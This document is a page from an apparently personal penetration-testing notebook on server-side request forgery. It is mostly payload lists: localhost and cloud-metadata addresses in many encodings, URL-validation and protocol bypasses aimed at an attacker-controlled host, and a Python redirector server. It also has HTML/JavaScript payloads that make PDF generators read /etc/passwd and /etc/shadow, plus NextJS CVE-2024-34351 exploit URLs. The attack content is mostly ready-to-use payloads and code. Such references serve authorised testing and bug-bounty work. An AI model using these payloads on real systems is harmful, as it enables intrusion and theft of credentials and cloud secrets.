0xSs0rZ
  • Hello World
  • Whoami
  • Pentest
    • Recon
      • Tools
      • Information Gathering
      • OSINT
        • Tools
        • Emails
        • Dark Web Exposure
        • Database Leak - Credential stuffing
        • Code Search (Gitlab / Github)
        • Credentials in git repos
        • GitHub - finding vulnerabilities
        • API Leaks
        • Social Media
        • Credentials in YouTube Videos
        • Metadata and Hidden infos
      • Whois
      • Google Dorks
      • Git Dorks
      • Cloud
      • DNS Subdomain Enumeration
      • Virtual Host
      • Fingerprinting / Crawling
      • Host Discovery
    • Protocols
      • Port Scan
      • IDS IPS AV Evasion
      • Common Ports
      • MindMap
      • DNS (53)
      • FTP (21)
      • IMAP POP3 (110, 143, 993, 995)
      • IPMI (623 UDP)
      • Kerberos (88)
      • LDAP (389)
      • MSSQL (1433)
      • MySQL (3306)
      • NFS (2049, 111)
      • Oracle TNS (1521, 1522-1529, 1748)
      • RDP (3389)
      • R-Services (512,513,514)
      • RSYNC (873)
      • SMB (445, 139) / RPC
      • SMTP (25, 465)
      • SNMP (10161, UDP 161)
      • SQLite
      • SSH (22)
      • WinRM (5985, 5986)
      • WMI (135)
    • Brute force
      • Default Credentials
      • Password lists
      • Username lists
      • Kraken - All-in-One Tool
      • Bypass IP Blocking
      • Hydra - Basics
      • Web login
      • FTP Bruteforce
      • O365 Bruteforce
      • POP3 Bruteforce
      • RDP Bruteforce
      • SMB Bruteforce
      • SMTP Bruteforce
      • SSH Bruteforce
      • WinRM Bruteforce
    • Shells
      • Web Shell
      • Bind and Reverse Shell
      • TTY Upgrade
    • File Transfer
      • Upload
      • Download - Exfiltration
      • Encryption
    • Web attacks
      • Methodology & Academy
      • OWASP Top 10
      • Avoid Aggressive Scanning
      • Web Enumeration
      • Fuzzing
      • Bypass 403 / 401
      • Registration Form
      • Email Verification Bypass
      • Email injections
      • Phone Number Injection
      • Login Forms Attacks
        • Bypass Authentication
        • Login Brute Force
        • Stay Logged In
        • PHP Type Juggling
      • Bypass Captcha
      • OAuth Misconfiguration
      • 2FA / OTP
      • Bypass 302
      • Password Reset
      • SQL Injection
      • NoSQL injection
      • LDAP Injection
      • XSS
      • SSI / ESI Injection
      • CSP Bypass
      • File Inclusion LFI / RFI
      • File Upload Attacks
      • Command Injection
      • Markdown injection
      • XPath Injection
      • HTTP Verb Tampering
      • HTTP Header Exploitation
      • HTTP Request Smuggling
      • Price / Checkout Manipulation Methods
      • Testing Credit Cards
      • Cookies Misconfiguration
      • Basic HTTP Authentification
      • JWT Token
      • IDOR
      • XXE / XSLT
      • SSTI
      • CSTI
      • SSRF
      • CSRF
      • CORS
      • Open Redirection
      • CSPT
      • Relative Path Overwrite, RPO
      • CRLF Injection
      • JSON Attack
      • Prototype Pollution
      • Web Mass Assignment
      • Web Cache
      • Clickjacking
      • Tabnabbing
      • Race Conditons
      • WAF Bypass
      • CMS
      • Django
      • Flask / Werkzeug
      • Tomcat (8080)
      • Tomcat CGI
      • Nginx
      • IIS
      • Exchange / OWA
      • GitLab
      • Jenkins
      • Splunk
      • Elasticsearch
      • PRTG Network Monitor
      • osTicket
      • ColdFusion
      • Nagios
      • Webmin
      • Slack
      • Moodle
      • Jira
      • Magento
      • Prestashop
      • Docker
    • API
      • OWASP API Top 10
      • Checklist
      • API Discovery / Reco
      • Sensitive Data (API Key, JWT token, etc.) Exposed
      • Postman Usage
      • ZAP Scanner
      • Swagger UI
      • REST API
      • Improper Asset Management
      • Email Enumeration
      • Authentication Bruteforce
      • JWT Token
      • Insecure UUID
      • Mass Assignment
      • Server Side Parameter Pollution
      • IDOR
      • JSON Injection
      • GraphQL
      • Tools & Scanners
      • Resources
    • Public Exploit
      • Search for CVE PoC
      • Convert line breaks from DOS to Linux
      • 7 zip
      • Adobe Acrobate Reader
      • Aiohttp
      • Angular
      • AnyDesk
      • Apache Active MQ
      • Apache Camel
      • Apache OFBiz
      • Apache Struts
      • Apache Traffic Control
      • Axis IP Camera
      • Cacti
      • Chamilo elearning
      • Check Point
      • Cisco
      • Citrix
      • Cleo File Transfer
      • CrushFTP
      • CyberPanel
      • D-Link
      • F5 Big-IP
      • Froxlor
      • Fortinet
      • GeoServer
      • Ghostscript
      • Gitea
      • GLPI
      • Gogs
      • Grafana
      • Ivanti
      • Keycloak
      • Laravel
      • Mitel MiCollab
      • MobileIron
      • MOVEit Transfer
      • Navidrome
      • Next.js
      • Node.js
      • Nostromo
      • NVMS 1000
      • OpenNetAdmin
      • Oracle PeopleSoft
      • Oracle Weblogic
      • Palo Alto
      • Pandora
      • PDF.js
      • pfSense
      • PHP
      • phpMyAdmin
      • Prestashop
      • Roundcube
      • rsync
      • Salesforce
      • SolarWinds
      • Splunk
      • Spring Framework
      • SQLPad
      • Squid Proxy
      • SuiteCRM
      • Symfony
      • TeamViewer
      • TP Link
      • VMWare
      • Wazuh
      • Winrar
      • YesWiki
      • Zabbix
      • Zimbra
      • ZoneAlarm AV/Firewall
      • ZoneMinder
    • External Pentest
    • Internal Pentest
      • Tools
      • Methodology & Cheatsheet
      • Basic Windows Commands
      • Network Attacks
      • LLMNR NBT-NS Poisoning
      • ADIDNS Spoofing
      • TimeRoast
      • Users Identification
      • Password Policy
      • Password Spray
      • LDAP Pass Back Attack
      • Reconaissance
        • Bloodhound
        • Enumeration from Windows Host
        • Enumeration from Linux Host
      • Microsoft Office & Outlook
      • Microsoft SharePoint
      • Windows Exploit
      • Print Spooler
      • LOL Bins
      • Security Controls
      • Network Shares
      • RDWA
      • Kerberoast
      • Misconfiguration
      • Pre-Created Computer Accounts
      • Privileged Access
      • ACL
      • Privilege escalation
      • SAM & LSA secrets
      • NTLM Hashes
      • LSASS secrets
      • AD CS
      • DPAPI
      • gMSA
      • Bypass Powershell Execution Policy
      • Disable / Remove AV Defender and Firewall
      • Kerberos Double Hop Problem
      • SCCM
      • AD FS
      • Trustee and Resource Delegation
      • LAPS
      • DCSync
      • NTDS secrets
      • Domain Password Audit Tools
      • Trusts
      • Persistence
      • Tiering
      • Detection
    • Privilege Escalation
      • Find specific file
      • Linux
        • Tools
        • Linux PrivEsc MindMap
        • Basics Commands
        • Basics - EoP Checklist
        • Environment Enum
        • Services & Internals Enum
        • Writable files / directories
        • /etc/passwd & /etc/shadow
        • Credentials Hunting
        • Path Abuse
        • Wildcard Abuse
        • Escaping Restricted Shells
        • SUID/SGID
        • Sudo Rights Abuse
        • Privileged Groups
        • Capabilities
        • Vulnerable Services
        • Cron Job Abuse
        • Kubernetes
        • Logrotate
        • Miscellaneous Techniques
        • Kernel Exploits
        • Shared Libraries
        • Shared Object Hijacking
        • Python Library Hijacking
        • su bruteforce
        • Hardening Linux
      • Windows
        • Tools
        • Cheatsheet
        • Enumeration
        • Credentials Hunting
        • User Privileges
        • Group Privileges
        • User Account control (UAC)
        • Weak Permissions
        • Kernel / Drivers Exploits
        • Vulnerable Services
        • Token Impersonation
        • Exploit CVE
        • DLL Hijacking
        • Citrix Breakout
        • RDWeb Breakout
        • Interacting with Users
        • Pillaging
        • Miscellaneous Techniques
        • Windows Server
        • Windows Desktop Versions
        • Windows Processes
        • MSI Files
        • NTLM elevation of privilege
        • From Local Admin to NT AUTHORITY\SYSTEM
      • Docker Escape / Breakout
    • Post Exploitation
      • Covering Tracks - Linux
      • Pivot, Tunneling and Port Forwarding
      • Lateral Movement
        • Pass the Hash (PtH)
        • Pass the Ticket (PtT) - Windows
        • Pass the Ticket (PtT) - Linux
        • Fileless Lateral Movement
        • DCOM
      • Gather credentials and more
        • Credentials on Host
        • Password managers, Teamviewer, Outlook, etc.
        • Microsoft Teams Cookies
        • Browser cookies
        • Linux post exploitation
        • Screenshots, clipboard
        • IIS Credentials
        • Azure AD / Entra ID
        • MSOL (Microsoft Online Services) account
        • SCOM credentials
        • Cisco phone system
      • Exfiltration
      • Resources
    • Cracking
      • Hashes
      • Files - Encrypted
      • Blurred image, pdf, etc
    • Thick Client Pentest
    • Wifi Pentest
    • Mobile Pentest
    • Configuration Audit
    • Code Analysis
    • Tools
      • Arsenal - Cheatsheet
      • Burp
      • Browser Extensions
      • Evil-WinRM
      • Internal Pentest Tools Pre Compiled
      • Metasploit
      • Mimikatz
      • NetExec - CME
      • PowerView
      • Rubeus
      • SQLMAP
      • Vulnerability Scanners
      • Collaborator, Web Hook, etc.
    • Search Engines
    • Cheatsheets
    • Note Keeping / Reporting / Admin Stuff
  • Cloud
    • Cloud VM
    • Enumeration
    • SSRF / RCE
    • Azure
    • AWS
    • GCP
    • Kubernetes
    • Tools
  • Antivirus Evasion - Defender
    • Mindmap
    • Defender Module for PowerShell
    • Static Analysis
    • Dynamic Analysis
    • AMSI Bypass
    • Process Injection
    • Open-Source Software
    • User Access Control (UAC)
    • AppLocker
    • LOLBAS / LOLDrivers / LOLESXi
    • PowerShell ConstrainedLanguage Mode, CLM
    • VBScript
    • Bypass all Powershell security features (AMSI,CLM)
    • Bypass AV Payload / Shells
    • Find Folder Exclusions
    • Resources
  • EDR BYPASS
    • Approches for Evasion
    • Tools
    • Obfuscation
    • EDR Killer
    • BYOVD
    • Spoof Command Line Arguments
    • Blind Spots
    • Living Off Security Tools / LOTTunels
    • Process Hollowing
    • Process Injection - Reverse Shell
    • Payload Creation
    • Shellcode Loader
    • MalDev
    • Malware Testing Lab
    • Resources
  • Red Team
    • OpSec / Anonymity
    • Initial Access
    • Infrastructure (phishing, C2, redirector)
    • C2
    • EDR / AV Bypass
    • Physical Penetration Testing
    • Resources
  • CTF
    • OSINT
    • Forensic
      • PCAP Analysis - Wireshark
      • DNS
      • Active Directory - GPO
      • Rubber Ducky
      • Memory Analysis
      • Disk Analysis
      • Extract Data / File Carving
      • Metadata
      • BinWalk
      • Audio
      • PNG Images
    • Cryptography
      • Tools
      • GPG
      • RSA
      • ECB / CBC
      • Esoteric Programming Language
      • One Time Pad
      • Baconian Cipher
      • ROT-13 / Caesar
      • Morse Code
      • XOR
      • Substitution
      • Vigenere
    • Steganography
      • Methods
      • Tools
Powered by GitBook
On this page
  • Detection - Vulnerable Parameters
  • Basic payload
  • Paylod List
  • Finding SSRF with Burp
  • Port scan
  • Filter Bypass
  • Decimal notation
  • Other notation
  • Use your own server to redirect on localhost
  • DNS Rebinding
  • More payloads
  • Cloud Metadata IP
  • URL / Host Validation Bypass
  • Bypassing protocol whitelists
  • Gopher
  • Blind SSRF with OOB
  • Platform to receive HTTP & DNS callbacks for SSRF (Blind) - interactsh
  • SSRF (XSS) in PDF Generator
  • NextJS apps
  • Tools
  • SSRFmap
  • Autossrf
  • 0dSSRF
  • SSRFPwned
  • Resources

Was this helpful?

  1. Pentest
  2. Web attacks

SSRF

Detection - Vulnerable Parameters

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
?show={target}
?navigation={target}

Basic payload

http://127.0.0.1
127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
127.1:80
0
0.0.0.0:80
localhost:80
[::]:80/
[::]:25/ SMTP
[::]:3128/ Squid
[0000::1]:80/
[0:0:0:0:0:ffff:127.0.0.1]/thefile
①②⑦.⓪.⓪.⓪
127.127.127.127
127.0.1.3
127.0.0.0
2130706433/
017700000001
3232235521/
3232235777/
0x7f000001/
0xc0a80014/
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@localhost

localhost#{domain}
{domain}.localhost
localhost/{domain}
localhost/?d={domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}st:+11211aaa
st:00011211aaaa
0/
127.1
127.0.1
1.1.1.1 &@2.2.2.2# @3
.3.3.3/
127.1.1.1:80\\@127
.2.2.2:80/
127.1.1.1:80\\@@127
.2.2.2:80/
127.1.1.1:80:\\@@127
.2.2.2:80/
127.1.1.1:80#\\@127
.2.2.2:80/

Paylod List

Finding SSRF with Burp

Match: https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)

Replace: https://{YOUR_SERVER}/ (Burp Collaborator)

Port scan

http://127.0.0.1:§80§

Filter Bypass

Burp extension

Decimal notation

http://2130706433 equals http://127.0.0.1.

Other notation

127.1 equals 127.0.0.1
IPFuscator
Author: Vincent Yiu (@vysecurity)
https://www.github.com/vysec/IPFuscator
Version: 0.1.0

IP Address:     127.0.0.1

Decimal:        2130706433
Hexadecimal:    0x7f000001
Octal:          017700000001

Full Hex:       0x7f.0x0.0x0.0x1
Full Oct:       0177.0.0.01

Random Padding:
Hex:    0x000000000007f.0x000000000000000000000000000000.0x0000.0x0000000000000000000000001
Oct:    00000000000000000000000177.000000000000000000.00000000000000000000000000000.000001

Random base:
#1:     0x7f.0x0.0.01
#2:     0x7f.0x0.0x0.1
#3:     0177.0x0.0x0.0x1
#4:     0x7f.0.0.01
#5:     127.0x0.0.0x1

Random base with random padding:
#1:     127.0x00000000.000000.000000000000000001
#2:     127.0x0000000000000.0x00000000000000000000000000000.0001
#3:     0000000000000000177.0x0000000000000000000000.0x00000000000000000000000000.1
#4:     0000000000000000000177.0.000000.1
#5:     127.0000000000000000000000.0x0000000000000000000.000000000000000000000000000001
1%32%37.0.0.%31
12%37.%30.%30.%31
%31%327.%30.0.%31
%31%327.%30.%30.1
12%37.0.%30.1
127.%30.%30.%31
1%32%37.0.%30.1
%3127.0.0.%31
%31%32%37.0.%30.%31
1%32%37.%30.0.1
%31%32%37.0.0.%31
%31%32%37.%30.0.%31
%312%37.0.%30.1
%312%37.0.%30.%31
127.0.%30.%31
%31%32%37.0.0.1
1%327.%30.%30.1
%312%37.%30.0.1
%31%32%37.0.%30.1
1%327.%30.0.%31
127.%30.0.%31
%31%327.0.0.%31
127.%30.%30.1
%3127.0.%30.%31
%31%327.%30.%30.%31
1%32%37.%30.%30.1
%3127.%30.%30.1
%31%327.0.%30.1
12%37.%30.0.%31
12%37.%30.%30.1
%312%37.%30.%30.1
1%32%37.0.%30.%31
%31%32%37.%30.0.1
%312%37.0.0.%31
12%37.0.%30.%31
%312%37.%30.0.%31
1%32%37.%30.0.%31
%3127.%30.0.%31
%3127.0.%30.1
%312%37.%30.%30.%31
%31%327.0.%30.%31
1%327.0.%30.%31
1%327.%30.%30.%31

Use your own server to redirect on localhost

redirector.py:

#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2: 
    print("""
Usage: {} <port_number> <url> 
    """.format(sys.argv[0]))
    sys.exit()
    
class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers() 
    def send_error(self, code, message=None): 
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Run redirector server:

python3 redirector.py 80 http://127.0.0.1

Vicitim payload: http://[YOUR_IP]

DNS Rebinding

Also try 127.0.0.1 and 169.254.169.254

More payloads

Cloud Metadata IP

169.254.169.254 
169.254.43518 
169.16689662
0xA9.254.0251.0376

URL / Host Validation Bypass

https://assets.example.com.attacker.com/

Replace "{CANARY_TOKEN}" with your controlled hostname and replace "example.com" with a whitelisted target host.

.{CANARY_TOKEN}
@{CANARY_TOKEN}
example.com.{CANARY_TOKEN}
example.com@{CANARY_TOKEN}
example.comx.{CANARY_TOKEN}
{CANARY_TOKEN}#example.com
{CANARY_TOKEN}?example.com
{CANARY_TOKEN}#@example.com
{CANARY_TOKEN}?@example.com
127.0.0.1.nip.io
example.com.127.0.0.1.nip.io
127.1
localhost.me

Bypassing protocol whitelists

//{CANARY_TOKEN}
\\{CANARY_TOKEN}
////{CANARY_TOKEN}
\\\\{CANARY_TOKEN}
http:{CANARY_TOKEN}
https:{CANARY_TOKEN}
/%00/{CANARY_TOKEN}
/%0A/{CANARY_TOKEN}
/%OD/{CANARY_TOKEN}
/%09/{CANARY_TOKEN}

Gopher

Blind SSRF with OOB

Platform to receive HTTP & DNS callbacks for SSRF (Blind) - interactsh

SSRF (XSS) in PDF Generator

<iframe src="http://localhost/"></iframe>
<iframe src=file:///etc/passwd></iframe>
"/><iframe src="file:///etc/shadow"></iframe>
<!-- Using XHR -->
<script>var x=new XMLHttpRequest();x.onload=(()=>document.write(this.responseText));x.open('GET','http://127.0.0.1');x.send();</script>

<!-- Using Fetch -->
<script>fetch('http://127.0.0.1').then(async r=>document.write(await r.text()))</script>

<!-- Using embed -->
<embed src="http://127.0.0.1" />

<!-- Using base HTML tag -->
<base href="http://127.0.0.1" />

<!-- Loading external stylesheet/script -->
<link rel="stylesheet" src="http://127.0.0.1" />
<script src="http://127.0.0.1"></script>

<!-- Meta-tag to auto-refresh page -->
<meta http-equiv="refresh" content="0; url=http://127.0.0.1/" />

<!-- Loading external image -->
<img src="http://127.0.0.1" />

<!-- Loading external SVG -->
<svg src="http://127.0.0.1" />

<!-- Useful to bypass blacklists -->
<input type="image" src="http://127.0.0.1" />
<video src="http://127.0.0.1" />
<audio src="http://127.0.0.1" />
<audio><source src="http://127.0.0.1"/></audio>
<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open('GET','http://127.0.0.1'); // You can also read local system files such as "/etc/passwd"
  x.send();
</script>
<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open("GET","file:///etc/passwd"); x.send();
</script>

Some PDF generators rely on the Chromium web browser without sandbox security enabled and with root privileges. This can often be further escalated to remote code execution!

NextJS apps

CVE-2024-34351 - fixed in v14.1.1.

https://example.com/_next/image?url=https://localhost:2345/api/v1/x&w=256&q=75
https://example.com/_next/image?url=https://third-party.com/logout%3furl%3Dhttps%3A%2F%2Flocalhost%3A2345%2Fapi%2Fv1%2Fx&w=256&q=75

Tools

SSRFmap

Autossrf

0dSSRF

SSRFPwned

Resources

PreviousCSTINextCSRF

Last updated 5 days ago

Was this helpful?

Source:

More payload:

Also check

See

https://x.com/intigriti/status/1848288871735320916?t=bTTpk3N1LoqLpO1768DhQw&s=03
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass
XSS
Paylaod List
Use your own server to redirect on localhost
LogoSSRF vulnerabilities and where to find them - Labs DetectifyLabs Detectify
LogoGitHub - MindPatch/lorsrf: Fast CLI tool to find the parameters that can be used to find SSRF or Out-of-band resource load :crab:GitHub
Logopayloads/ssrf.txt at main · coffinxp/payloadsGitHub
LogoBug Bounty tip Automating SSRFMedium
LogoURL Format BypassHackTricks
LogoGitHub - hackerassociate/SSRF-Hacks-IP-Decimal: A Burp Suite extension that converts IP addresses to decimal notation, useful for SSRF bypass and WAF evasion testing. Created by Harshad Shah.GitHub
LogoSSRF payloadsMedium
LogoGitHub - vysecurity/IPFuscator: IPFuscator - A tool to automatically generate alternative IP representationsGitHub
LogoGitHub - whiteSHADOW1234/MorphURL: ⚔️ A command-line tool for IP address and URL obfuscation/de-obfuscation, providing diverse techniques for enhanced privacy and security.GitHub
LogoJust Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo MailMedium
Logorbndr.us dns rebinding service
LogoBypassing Filters: SSRF Exploitation via DNS Rebinding with Just 1 in 30 Successful RequestsMedium
LogoBypassing Filters: SSRF Exploitation via DNS Rebinding with Just 1 in 30 Successful RequestsMedium
LogoUsing Wayback And DNS rebinding For SSRFMedium
LogoServer-side Request Forgery (SSRF) via DNS Rebinding AttackSecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
LogoNew crazy payloads in the URL Validation Bypass Cheat SheetPortSwigger Research
FreeDNS - Free subdomain AND domain hosting!
LogoURL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy
LogoHow Gopher works in escalating SSRFsInfoSec Write-ups
LogoGitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various serversGitHub
LogoGitHub - assetnote/blind-ssrf-chains: An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerabilityGitHub
LogoExploit Blind SSRF with OOB Techniques - TCM SecurityTCM Security - Penetration Testing & Consulting
LogoGitHub - projectdiscovery/interactsh: An OOB interaction gathering server and client libraryGitHub
LogoPDFReacter SSRF to ROOT Level Local File Read which led to RCEMedium
LogoHunting for SSRF Bugs in PDF Generators  - Black Hills Information SecurityBlack Hills Information Security
LogoExploiting SSRF in PDF HTML Injection: Basic and BlindInfoSec Write-ups
LogoExploiting PDF generators: A complete guide to finding SSRF vulnerabilities in PDF generatorsIntigriti
LogoDigging for SSRF in NextJS apps
LogoGitHub - swisskyrepo/SSRFmap: Automatic SSRF fuzzer and exploitation toolGitHub
LogoGitHub - Th0h0/autossrf: Smart context-based SSRF vulnerability scanner.GitHub
LogoGitHub - KariiemGamal/0dSSRF: a powerful tool designed to automate the detection of Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilitiesGitHub
LogoGitHub - blackhatethicalhacking/SSRFPwned: Checks for SSRF using built-in custom Payloads after fetching URLs from Multiple Passive Sources & applying complex patterns aimed at SSRFGitHub
LogoBug-Bounty-Methodology/Server Side Request Forgery.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub
LogoSSRF: A complete guide to exploiting advanced SSRF vulnerabilitiesIntigriti
LogoHow To: Server-Side Request Forgery (SSRF)HackerOne
LogoSSRF Cheat Sheet & Bypass Techniques
LogoA10 Falsification de requête côté serveur (SSRF) - OWASP Top 10:2021
LogoWhat is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security AcademyWebSecAcademy
LogoServer-Side Request Forgery (SSRF) | Common Attacks & Risks | ImpervaLearning Center
LogoServer Side Request Forgery Prevention - OWASP Cheat Sheet Series
LogoServer-Side Request Forgery (SSRF)Intigriti
LogoI Studied 100+ SSRF Reports, and Here’s What I LearnedInfoSec Write-ups